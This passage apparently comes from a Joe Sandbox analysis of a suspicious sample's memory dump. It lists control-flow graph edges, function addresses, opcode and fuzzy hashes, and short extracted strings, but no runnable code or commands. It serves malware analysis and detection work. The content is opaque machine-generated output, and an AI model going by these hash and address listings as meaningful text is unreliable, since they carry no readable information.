1964->1965 1972 648577c-648577f 1965->1972 1973 6485777 1965->1973 1966->1953 1967->1968 1968->1949 1968->1954 1972->1920 1972->1933 1973->1972 1978 64857d2-64857d9 1976->1978 1979 64857e4-64857e7 1976->1979 1980 64858ba-64858c1 1978->1980 1981 64857df 1978->1981 1982 6485809-648580c 1979->1982 1983 64857e9-64857ed 1979->1983 1981->1979 1986 648582e-6485831 1982->1986 1987 648580e-6485812 1982->1987 1984 64858c2-64858fc 1983->1984 1985 64857f3-64857fb 1983->1985 1999 64858fe-6485901 1984->1999 1985->1984 1988 6485801-6485804 1985->1988 1990 648584f-6485852 1986->1990 1991 6485833-6485837 1986->1991 1987->1984 1989 6485818-6485820 1987->1989 1988->1982 1989->1984 1995 6485826-6485829 1989->1995 1992 6485863-6485866 1990->1992 1993 6485854-648585e 1990->1993 1991->1984 1996 648583d-6485845 1991->1996 1997 6485868-648586c 1992->1997 1998 6485880-6485883 1992->1998 1993->1992 1995->1986 1996->1984 2000 6485847-648584a 1996->2000 1997->1984 2002 648586e-6485876 1997->2002 2005 648588d-6485890 1998->2005 2006 6485885-648588c 1998->2006 2003 6485919-648591c 1999->2003 2004 6485903-6485916 1999->2004 2000->1990 2002->1984 2007 6485878-648587b 2002->2007 2008 648593a-648593d 2003->2008 2009 648591e-648592f 2003->2009 2010 64858a8-64858aa 2005->2010 2011 6485892-64858a3 2005->2011 2007->1998 2013 648593f-6485950 2008->2013 2014 6485957-648595a 2008->2014 2024 64859b5-64859bc 2009->2024 2025 6485935 2009->2025 2015 64858ac 2010->2015 2016 64858b1-64858b4 2010->2016 2011->2010 2013->2004 2026 6485952 2013->2026 2017 6485960-6485963 2014->2017 2018 64859e7-6485b7b 2014->2018 2015->2016 2016->1976 2016->1980 2022 648597d-6485980 2017->2022 2023 6485965-6485976 2017->2023 2069 6485cb1-6485cc4 2018->2069 2070 6485b81-6485b88 2018->2070 2022->2018 2028 6485982-6485985 2022->2028 2023->2024 2035 6485978 2023->2035 2027 64859c1-64859c4 2024->2027 2025->2008 2026->2014 2030 64859de-64859e1 2027->2030 2031 64859c6-64859d7 2027->2031 2033 6485993-6485996 2028->2033 2034 6485987-648598e 2028->2034 2030->2018 2036 6485cc7-6485cca 2030->2036 2031->2023 2043 64859d9 2031->2043 2037 6485998-64859a9 2033->2037 2038 64859b0-64859b3 2033->2038 2034->2033 2035->2022 2041 6485ccc-6485cd1 2036->2041 2042 6485cd4-6485cd6 2036->2042 2037->2024 2048 64859ab 2037->2048 2038->2024 2038->2027 2041->2042 2044 6485cd8 2042->2044 2045 6485cdd-6485ce0 2042->2045 2043->2030 2044->2045 2045->1999 2049 6485ce6-6485cef 2045->2049 2048->2038 2071 6485c3c-6485c43 2070->2071 2072 6485b8e-6485bc1 2070->2072 2071->2069 2073 6485c45-6485c78 2071->2073 2082 6485bc3 2072->2082 2083 6485bc6-6485c07 2072->2083 2085 6485c7a 2073->2085 2086 6485c7d-6485caa 2073->2086 2082->2083 2094 6485c09-6485c1a 2083->2094 2095 6485c1f-6485c26 2083->2095 2085->2086 2086->2049 2094->2049 2097 6485c2e-6485c30 2095->2097 2097->2049
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000D.00000002.4168198526.0000000006480000.00000040.00000800.00020000.00000000.sdmp, Offset: 06480000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_13_2_6480000_sFPEKzHsLkYZIz.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: $
                                                                                      • API String ID: 0-3993045852
                                                                                      • Opcode ID: 7e8a9b2156f1bdc26738ccb0fde9c16b203bc1a60f057c8d8cd40f2e88d9880a
                                                                                      • Instruction ID: ad068328689a845d9dc0d637cb44ce27dcdbcd685bb4ada38f9c3be673c7c69a
                                                                                      • Opcode Fuzzy Hash: 7e8a9b2156f1bdc26738ccb0fde9c16b203bc1a60f057c8d8cd40f2e88d9880a
                                                                                      • Instruction Fuzzy Hash: 6C22B135E002158FDFA9EF64C4806AEB7F2EF85310F20846AD449AB345DB35DD45CB91
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 06482752 Relevance: 1.0, Instructions: 1020COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000D.00000002.4168198526.0000000006480000.00000040.00000800.00020000.00000000.sdmp, Offset: 06480000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_13_2_6480000_sFPEKzHsLkYZIz.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 66c39f7672e6f009e4348d10a6a926142d7d6358ff805c9308ce5a5a6d4c9f66
                                                                                      • Instruction ID: d05fee9a5617486ad45e6fbc32108bfb3f73bf28607dc5a7b9358dcf1f5e4741
                                                                                      • Opcode Fuzzy Hash: 66c39f7672e6f009e4348d10a6a926142d7d6358ff805c9308ce5a5a6d4c9f66
                                                                                      • Instruction Fuzzy Hash: CE926834A00204CFDB65EF68C584A6EBBF2FB48314F5484AAD809DB365DB75ED85CB90
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 06486600 Relevance: .8, Instructions: 831COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000D.00000002.4168198526.0000000006480000.00000040.00000800.00020000.00000000.sdmp, Offset: 06480000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_13_2_6480000_sFPEKzHsLkYZIz.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 1a17e33668908494395cbc8305da5178fee2cb2e1c411d295679f0bf097dbfe8
                                                                                      • Instruction ID: 555da6da8bf8cfbea0b0bd2d416de839ccd610f003fb6739ce45e434d75fa88b
                                                                                      • Opcode Fuzzy Hash: 1a17e33668908494395cbc8305da5178fee2cb2e1c411d295679f0bf097dbfe8
                                                                                      • Instruction Fuzzy Hash: 3562B130B00204CFDB95EB68D594AAEB7F2EF85304F15846AE40AEB355DB35ED46CB81
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0648C1A8 Relevance: .6, Instructions: 649COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000D.00000002.4168198526.0000000006480000.00000040.00000800.00020000.00000000.sdmp, Offset: 06480000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_13_2_6480000_sFPEKzHsLkYZIz.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 0b9064f151ecb7a6449084743eb22d8ce55a764e5271fd9d731ce96128e1eb64
                                                                                      • Instruction ID: 226dcaef30b5067596246ee3e11feb9274bf12ab64478f020ea16e2244c31530
                                                                                      • Opcode Fuzzy Hash: 0b9064f151ecb7a6449084743eb22d8ce55a764e5271fd9d731ce96128e1eb64
                                                                                      • Instruction Fuzzy Hash: 35329F34B002099FDF55EB68D980BAEB7B2FB88310F14856AE405E7355DB35EC46CBA1
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0648B238 Relevance: .6, Instructions: 570COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000D.00000002.4168198526.0000000006480000.00000040.00000800.00020000.00000000.sdmp, Offset: 06480000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_13_2_6480000_sFPEKzHsLkYZIz.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 10c5e3a339e15f85712e34a10d2068d622f4868645a18e1863417b1973ae9e5b
                                                                                      • Instruction ID: 03e5db01b641795e854a519154cc1b7e8838ddf94c037d0edda22df5e44354dc
                                                                                      • Opcode Fuzzy Hash: 10c5e3a339e15f85712e34a10d2068d622f4868645a18e1863417b1973ae9e5b
                                                                                      • Instruction Fuzzy Hash: FC227230E102098FDF65EB68D584BAEB7F6EB85310F248966E409EB391CA35DC85CB51
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0648ACE0 Relevance: 10.4, Strings: 8, Instructions: 396COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 0 648ace0-648acfe 2 648ad00-648ad03 0->2 3 648ad13-648ad16 2->3 4 648ad05-648ad0e 2->4 5 648ad39-648ad3c 3->5 6 648ad17-648ad34 3->6 4->3 7 648ad4d-648ad50 5->7 8 648ad3e-648ad42 5->8 6->5 12 648ad6a-648ad6d 7->12 13 648ad52-648ad65 7->13 10 648ad48 8->10 11 648af0c-648af16 8->11 10->7 14 648ad6f-648ad78 12->14 15 648ad87-648ad8a 12->15 13->12 16 648ad7e-648ad82 14->16 17 648af17-648af4e 14->17 18 648ad8c-648ad91 15->18 19 648ad94-648ad97 15->19 16->15 27 648af50-648af53 17->27 18->19 22 648aefd-648af06 19->22 23 648ad9d-648ada0 19->23 22->11 22->14 25 648ada2-648adaf 23->25 26 648adb4-648adb6 23->26 25->26 28 648adb8 26->28 29 648adbd-648adc0 26->29 30 648af59-648af94 27->30 31 648b1bc-648b1bf 27->31 28->29 29->2 33 648adc6-648adea 29->33 40 648af9a-648afa6 30->40 41 648b187-648b19a 30->41 34 648b1ce-648b1d1 31->34 35 648b1c1 call 648b238 31->35 51 648aefa 33->51 52 648adf0-648adff 33->52 37 648b1e2-648b1e5 34->37 38 648b1d3-648b1d7 34->38 42 648b1c7-648b1c9 35->42 44 648b208-648b20b 37->44 45 648b1e7-648b203 37->45 38->30 43 648b1dd 38->43 56 648afa8-648afc1 40->56 57 648afc6-648b00a 40->57 49 648b19c 41->49 42->34 43->37 47 648b218-648b21a 44->47 48 648b20d-648b217 44->48 45->44 54 648b21c 47->54 55 648b221-648b224 47->55 59 648b19d 49->59 51->22 62 648ae01-648ae07 52->62 63 648ae17-648ae52 call 64865b0 52->63 54->55 55->27 58 648b22a-648b234 55->58 56->49 76 648b00c-648b01e 57->76 77 648b026-648b065 57->77 59->59 65 648ae09 62->65 66 648ae0b-648ae0d 62->66 79 648ae6a-648ae81 63->79 80 648ae54-648ae5a 63->80 65->63 66->63 76->77 85 648b06b-648b146 call 64865b0 77->85 86 648b14c-648b161 77->86 94 648ae99-648aeaa 79->94 95 648ae83-648ae89 79->95 83 648ae5c 80->83 84 648ae5e-648ae60 80->84 83->79 84->79 85->86 86->41 100 648aeac-648aeb2 94->100 101 648aec2-648aef3 94->101 96 648ae8b 95->96 97 648ae8d-648ae8f 95->97 96->94 97->94 103 648aeb4 100->103 104 648aeb6-648aeb8 100->104 101->51 103->101 104->101
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000D.00000002.4168198526.0000000006480000.00000040.00000800.00020000.00000000.sdmp, Offset: 06480000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_13_2_6480000_sFPEKzHsLkYZIz.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: $^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
                                                                                      • API String ID: 0-3823777903
                                                                                      • Opcode ID: 565055d87d64fb702f17903908d59095358f27b78134504bf023bcedb67293e5
                                                                                      • Instruction ID: 46f242c79bf943df17f7d461be42393db40f9bd4b48d8d248c16c30685d45b84
                                                                                      • Opcode Fuzzy Hash: 565055d87d64fb702f17903908d59095358f27b78134504bf023bcedb67293e5
                                                                                      • Instruction Fuzzy Hash: 7AE16E30E102098FCB66EF69D9846AEB7F2EF85300F24896BD405DB355DB75D886CB81
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0648B660 Relevance: 8.0, Strings: 6, Instructions: 474COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 254 648b660-648b682 255 648b684-648b687 254->255 256 648b689-648b692 255->256 257 648b697-648b69a 255->257 256->257 258 648b6a0-648b6a3 257->258 259 648b844-648b847 257->259 260 648b6b0-648b6b3 258->260 261 648b6a5-648b6ab 258->261 262 648b84d 259->262 263 648b7c7-648b7ca 259->263 264 648b6f2-648b6f5 260->264 265 648b6b5-648b6ca 260->265 261->260 268 648b852-648b855 262->268 266 648ba0f-648ba46 263->266 267 648b7d0-648b7d7 263->267 271 648b71b-648b71e 264->271 272 648b6f7-648b6fe 264->272 265->266 291 648b6d0-648b6ed 265->291 294 648ba48-648ba4b 266->294 273 648b7dc-648b7df 267->273 269 648b998-648b999 268->269 270 648b85b-648b85e 268->270 278 648b99e-648b9a1 269->278 270->269 274 648b864-648b867 270->274 275 648b748-648b74b 271->275 276 648b720-648b727 271->276 272->266 280 648b704-648b714 272->280 281 648b7f9-648b7fc 273->281 282 648b7e1-648b7e8 273->282 284 648b869-648b87e 274->284 285 648b8a6-648b8a9 274->285 289 648b74d-648b74f 275->289 290 648b752-648b755 275->290 276->266 288 648b72d-648b73d 276->288 292 648b823-648b829 278->292 293 648b9a7-648b9aa 278->293 280->276 306 648b716 280->306 286 648b81e-648b821 281->286 287 648b7fe-648b819 281->287 282->266 283 648b7ee-648b7f4 282->283 283->281 284->266 329 648b884-648b8a1 284->329 302 648b8ab-648b8ae 285->302 303 648b8b3-648b8b6 285->303 286->292 296 648b834-648b837 286->296 287->286 288->269 326 648b743 288->326 289->290 290->269 299 648b75b-648b75e 290->299 291->264 297 648b928-648b92e 292->297 298 648b82f 292->298 304 648b9ac-648b9ae 293->304 305 648b9b1-648b9b4 293->305 300 648ba4d-648ba69 294->300 301 648ba6e-648ba71 294->301 310 648b839-648b83a 296->310 311 648b83f-648b842 296->311 297->266 309 648b934-648b93b 297->309 298->296 312 648b760-648b7bd call 64865b0 299->312 313 648b7c2-648b7c5 299->313 300->301 314 648bcdd-648bcdf 301->314 315 648ba77-648ba9f 301->315 302->303 317 648b8b8-648b8bf 303->317 318 648b8e0-648b8e3 303->318 304->305 320 648b9c4-648b9c7 305->320 321 648b9b6-648b9bf 305->321 306->271 327 648b940-648b943 309->327 310->311 311->259 311->268 312->313 313->263 313->273 324 648bce1 314->324 325 648bce6-648bce9 314->325 368 648baa9-648baed 315->368 369 648baa1-648baa4 315->369 317->266 330 648b8c5-648b8d5 317->330 322 648b8fd-648b900 318->322 323 648b8e5-648b8ec 318->323 331 648b9c9-648b9d0 320->331 332 648b9dd-648b9e0 320->332 321->320 337 648b910-648b913 322->337 338 648b902-648b90b 322->338 323->266 334 648b8f2-648b8f8 323->334 324->325 325->294 339 648bcef-648bcf8 325->339 326->275 341 648b945-648b961 327->341 342 648b966-648b969 327->342 329->285 330->272 362 648b8db 330->362 331->266 333 648b9d2-648b9d8 331->333 335 648b9f2-648b9f4 332->335 336 648b9e2 332->336 333->332 334->322 345 648b9fb-648b9fe 335->345 346 648b9f6 335->346 355 648b9ea-648b9ed 336->355 347 648b923-648b926 337->347 348 648b915-648b91e 337->348 338->337 341->342 350 648b96b-648b977 342->350 351 648b97c-648b97f 342->351 345->255 356 648ba04-648ba0e 345->356 346->345 347->297 347->327 348->347 350->351 359 648b981-648b988 351->359 360 648b993-648b996 351->360 355->335 359->256 364 648b98e 359->364 360->269 360->278 362->318 364->360 376 648bcd2-648bcdc 368->376 377 648baf3-648bafc 368->377 369->339 379 648bcc8-648bccd 377->379 380 648bb02-648bb6e call 64865b0 377->380 379->376 388 648bc68-648bc7d 380->388 389 648bb74-648bb79 380->389 388->379 390 648bb7b-648bb81 389->390 391 648bb95 389->391 393 648bb83-648bb85 390->393 394 648bb87-648bb89 390->394 395 648bb97-648bb9d 391->395 396 648bb93 393->396 394->396 397 648bb9f-648bba5 395->397 398 648bbb2-648bbbf 395->398 396->395 399 648bbab 397->399 400 648bc53-648bc62 397->400 405 648bbc1-648bbc7 398->405 406 648bbd7-648bbe4 398->406 399->398 401 648bc1a-648bc27 399->401 402 648bbe6-648bbf3 399->402 400->388 400->389 414 648bc29-648bc2f 401->414 415 648bc3f-648bc4c 401->415 412 648bc0b-648bc18 402->412 413 648bbf5-648bbfb 402->413 409 648bbc9 405->409 410 648bbcb-648bbcd 405->410 406->400 409->406 410->406 412->400 416 648bbfd 413->416 417 648bbff-648bc01 413->417 418 648bc31 414->418 419 648bc33-648bc35 414->419 415->400 416->412 417->412 418->415 419->415
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000D.00000002.4168198526.0000000006480000.00000040.00000800.00020000.00000000.sdmp, Offset: 06480000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_13_2_6480000_sFPEKzHsLkYZIz.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: $^q$$^q$$^q$$^q$$^q$$^q
                                                                                      • API String ID: 0-2392861976
                                                                                      • Opcode ID: 133c5eefcdf977f4a0dcf7723bfa594f03055be4ed863192ee40d3bd5a979db6
                                                                                      • Instruction ID: f7248a6a2b7b7d1da6db1f4ed88d0e9b4193cf88d85ff4ebb096aaf65f695601
                                                                                      • Opcode Fuzzy Hash: 133c5eefcdf977f4a0dcf7723bfa594f03055be4ed863192ee40d3bd5a979db6
                                                                                      • Instruction Fuzzy Hash: EF025C30E002098FDBA5EFA8D584AAEB7F2FB45310F14856AE405EB355DB35DC86CB81
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 06489158 Relevance: 5.2, Strings: 4, Instructions: 230COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 422 6489158-648917d 423 648917f-6489182 422->423 424 6489188-648919d 423->424 425 6489a40-6489a43 423->425 432 648919f-64891a5 424->432 433 64891b5-64891cb 424->433 426 6489a69-6489a6b 425->426 427 6489a45-6489a64 425->427 428 6489a6d 426->428 429 6489a72-6489a75 426->429 427->426 428->429 429->423 431 6489a7b-6489a85 429->431 435 64891a9-64891ab 432->435 436 64891a7 432->436 439 64891d6-64891d8 433->439 435->433 436->433 440 64891da-64891e0 439->440 441 64891f0-6489261 439->441 442 64891e2 440->442 443 64891e4-64891e6 440->443 452 648928d-64892a9 441->452 453 6489263-6489286 441->453 442->441 443->441 458 64892ab-64892ce 452->458 459 64892d5-64892f0 452->459 453->452 458->459 464 648931b-6489336 459->464 465 64892f2-6489314 459->465 470 6489338-6489354 464->470 471 648935b-6489369 464->471 465->464 470->471 472 6489379-64893f3 471->472 473 648936b-6489374 471->473 479 6489440-6489455 472->479 480 64893f5-6489413 472->480 473->431 479->425 484 648942f-648943e 480->484 485 6489415-6489424 480->485 484->479 484->480 485->484
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000D.00000002.4168198526.0000000006480000.00000040.00000800.00020000.00000000.sdmp, Offset: 06480000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_13_2_6480000_sFPEKzHsLkYZIz.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: $^q$$^q$$^q$$^q
                                                                                      • API String ID: 0-2125118731
                                                                                      • Opcode ID: a8a795d286bf9f711a33cceb490a62ee38050d3c30653c570a51fa83edf6d509
                                                                                      • Instruction ID: 0936a7d525e73a13e66653b8a47ed3a7ea27c0395d2e98a28391bbf54306ac75
                                                                                      • Opcode Fuzzy Hash: a8a795d286bf9f711a33cceb490a62ee38050d3c30653c570a51fa83edf6d509
                                                                                      • Instruction Fuzzy Hash: 36915330B0060A9FDB55EF69D850BAF77F6AFC9204F14856AC409EB344DB349D46CB91
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0648CF70 Relevance: 4.5, Strings: 3, Instructions: 797COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 488 648cf70-648cf8b 489 648cf8d-648cf90 488->489 490 648cfad-648cfb0 489->490 491 648cf92-648cfa8 489->491 492 648cff9-648cffc 490->492 493 648cfb2-648cff4 490->493 491->490 495 648cffe-648d040 492->495 496 648d045-648d048 492->496 493->492 495->496 498 648d04a-648d08c 496->498 499 648d091-648d094 496->499 498->499 502 648d0dd-648d0e0 499->502 503 648d096-648d0a5 499->503 504 648d129-648d12c 502->504 505 648d0e2-648d124 502->505 507 648d0b4-648d0c0 503->507 508 648d0a7-648d0ac 503->508 511 648d12e-648d14a 504->511 512 648d14f-648d152 504->512 505->504 513 648d989-648d9be 507->513 514 648d0c6-648d0d8 507->514 508->507 511->512 517 648d161-648d164 512->517 518 648d154-648d156 512->518 533 648d9c0-648d9c3 513->533 514->502 522 648d458-648d464 517->522 523 648d16a-648d16d 517->523 520 648d15c 518->520 521 648d455 518->521 520->517 521->522 522->503 528 648d46a-648d757 522->528 531 648d16f-648d1b1 523->531 532 648d1b6-648d1b9 523->532 700 648d75d-648d763 528->700 701 648d97e-648d988 528->701 531->532 536 648d1bb-648d1ca 532->536 537 648d202-648d205 532->537 538 648d9c5-648d9f1 533->538 539 648d9f6-648d9f9 533->539 542 648d1d9-648d1e5 536->542 543 648d1cc-648d1d1 536->543 549 648d24e-648d251 537->549 550 648d207-648d249 537->550 538->539 547 648d9fb-648da17 539->547 548 648da1c-648da1f 539->548 542->513 554 648d1eb-648d1fd 542->554 543->542 547->548 552 648da2e-648da30 548->552 553 648da21 call 648dadd 548->553 555 648d25b-648d25e 549->555 556 648d253-648d258 549->556 550->549 558 648da32 552->558 559 648da37-648da3a 552->559 568 648da27-648da29 553->568 554->537 564 648d260-648d2a2 555->564 565 648d2a7-648d2aa 555->565 556->555 558->559 559->533 571 648da3c-648da4b 559->571 564->565 569 648d2ac-648d2ee 565->569 570 648d2f3-648d2f6 565->570 568->552 569->570 576 648d2f8-648d2fa 570->576 577 648d301-648d303 570->577 587 648da4d-648dab0 call 64865b0 571->587 588 648dab2-648dac7 571->588 581 648d2fc 576->581 582 648d313-648d31c 576->582 583 648d30a-648d30d 577->583 584 648d305 577->584 581->577 591 648d32b-648d337 582->591 592 648d31e-648d323 582->592 583->489 583->582 584->583 587->588 596 648d448-648d44d 591->596 597 648d33d-648d351 591->597 592->591 596->521 597->521 612 648d357-648d369 597->612 618 648d36b-648d371 612->618 619 648d38d-648d38f 612->619 621 648d373 618->621 622 648d375-648d381 618->622 625 648d399-648d3a5 619->625 626 648d383-648d38b 621->626 622->626 632 648d3b3 625->632 633 648d3a7-648d3b1 625->633 626->625 634 648d3b8-648d3ba 632->634 633->634 634->521 637 648d3c0-648d3dc call 64865b0 634->637 645 648d3eb-648d3f7 637->645 646 648d3de-648d3e3 637->646 645->596 648 648d3f9-648d446 645->648 646->645 648->521 702 648d772-648d77b 700->702 703 648d765-648d76a 700->703 702->513 704 648d781-648d794 702->704 703->702 706 648d79a-648d7a0 704->706 707 648d96e-648d978 704->707 708 648d7af-648d7b8 706->708 709 648d7a2-648d7a7 706->709 707->700 707->701 708->513 710 648d7be-648d7df 708->710 709->708 713 648d7ee-648d7f7 710->713 714 648d7e1-648d7e6 710->714 713->513 715 648d7fd-648d81a 713->715 714->713 715->707 718 648d820-648d826 715->718 718->513 719 648d82c-648d845 718->719 721 648d84b-648d872 719->721 722 648d961-648d968 719->722 721->513 725 648d878-648d882 721->725 722->707 722->718 725->513 726 648d888-648d89f 725->726 728 648d8ae-648d8c9 726->728 729 648d8a1-648d8ac 726->729 728->722 734 648d8cf-648d8e8 call 64865b0 728->734 729->728 738 648d8ea-648d8ef 734->738 739 648d8f7-648d900 734->739 738->739 739->513 740 648d906-648d95a 739->740 740->722
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000D.00000002.4168198526.0000000006480000.00000040.00000800.00020000.00000000.sdmp, Offset: 06480000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_13_2_6480000_sFPEKzHsLkYZIz.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: $^q$$^q$$^q
                                                                                      • API String ID: 0-831282457
                                                                                      • Opcode ID: c50b6204226a00b64caac859b73914218e2400219590d3a2e6dd60dd1fb9203d
                                                                                      • Instruction ID: 567b5078647eae074d0babdf415f4b5863a713b3a868a3cedc72e9cc009e6ccb
                                                                                      • Opcode Fuzzy Hash: c50b6204226a00b64caac859b73914218e2400219590d3a2e6dd60dd1fb9203d
                                                                                      • Instruction Fuzzy Hash: DC626130A006059FCB55EF68D590A5EB7F2FF84304F248A6AD0099F759DB71ED8ACB80
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 06484B80 Relevance: 3.9, Strings: 3, Instructions: 186COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 748 6484b80-6484ba4 749 6484ba6-6484ba9 748->749 750 6484bca-6484bcd 749->750 751 6484bab-6484bc5 749->751 752 64852ac-64852ae 750->752 753 6484bd3-6484ccb 750->753 751->750 755 64852b0 752->755 756 64852b5-64852b8 752->756 771 6484d4e-6484d55 753->771 772 6484cd1-6484d1e call 648542a 753->772 755->756 756->749 758 64852be-64852cb 756->758 773 6484dd9-6484de2 771->773 774 6484d5b-6484dcb 771->774 785 6484d24-6484d40 772->785 773->758 791 6484dcd 774->791 792 6484dd6 774->792 789 6484d4b-6484d4c 785->789 790 6484d42 785->790 789->771 790->789 791->792 792->773
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000D.00000002.4168198526.0000000006480000.00000040.00000800.00020000.00000000.sdmp, Offset: 06480000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_13_2_6480000_sFPEKzHsLkYZIz.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: fcq$XPcq$\Ocq
                                                                                      • API String ID: 0-3575482020
                                                                                      • Opcode ID: d1dfc068fc6c06d4d3fa0c6330dec267c247eaa5059ae511cff4b453f55556e7
                                                                                      • Instruction ID: 10455c6a2a513af62de3de9cd3231d77421a18a61173844067b19c872fa00cd0
                                                                                      • Opcode Fuzzy Hash: d1dfc068fc6c06d4d3fa0c6330dec267c247eaa5059ae511cff4b453f55556e7
                                                                                      • Instruction Fuzzy Hash: B3618030F002099FEB55AFA5C8547AEBAF6EF88700F20842AE105EB395DB758D45CB91
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 06489149 Relevance: 2.7, Strings: 2, Instructions: 162COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 1804 6489149-648917d 1806 648917f-6489182 1804->1806 1807 6489188-648919d 1806->1807 1808 6489a40-6489a43 1806->1808 1815 648919f-64891a5 1807->1815 1816 64891b5-64891cb 1807->1816 1809 6489a69-6489a6b 1808->1809 1810 6489a45-6489a64 1808->1810 1811 6489a6d 1809->1811 1812 6489a72-6489a75 1809->1812 1810->1809 1811->1812 1812->1806 1814 6489a7b-6489a85 1812->1814 1818 64891a9-64891ab 1815->1818 1819 64891a7 1815->1819 1822 64891d6-64891d8 1816->1822 1818->1816 1819->1816 1823 64891da-64891e0 1822->1823 1824 64891f0-6489261 1822->1824 1825 64891e2 1823->1825 1826 64891e4-64891e6 1823->1826 1835 648928d-64892a9 1824->1835 1836 6489263-6489286 1824->1836 1825->1824 1826->1824 1841 64892ab-64892ce 1835->1841 1842 64892d5-64892f0 1835->1842 1836->1835 1841->1842 1847 648931b-6489336 1842->1847 1848 64892f2-6489314 1842->1848 1853 6489338-6489354 1847->1853 1854 648935b-6489369 1847->1854 1848->1847 1853->1854 1855 6489379-64893f3 1854->1855 1856 648936b-6489374 1854->1856 1862 6489440-6489455 1855->1862 1863 64893f5-6489413 1855->1863 1856->1814 1862->1808 1867 648942f-648943e 1863->1867 1868 6489415-6489424 1863->1868 1867->1862 1867->1863 1868->1867
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000D.00000002.4168198526.0000000006480000.00000040.00000800.00020000.00000000.sdmp, Offset: 06480000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_13_2_6480000_sFPEKzHsLkYZIz.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: $^q$$^q
                                                                                      • API String ID: 0-355816377
                                                                                      • Opcode ID: 3fb667a2f694d89ed99ee3a0c8e2e626107b27fb80ecfb449f78788bde49466f
                                                                                      • Instruction ID: 4a5df8bee6f27dfacf73fdc40cf4f976d4e03f7fba860e850bbb9fa43a92db57
                                                                                      • Opcode Fuzzy Hash: 3fb667a2f694d89ed99ee3a0c8e2e626107b27fb80ecfb449f78788bde49466f
                                                                                      • Instruction Fuzzy Hash: CF515030B005059FDB55EB78D890BAF77FAEBC8644F14856AD40ADB388EA34DD42CB91
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 06484B71 Relevance: 2.6, Strings: 2, Instructions: 145COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
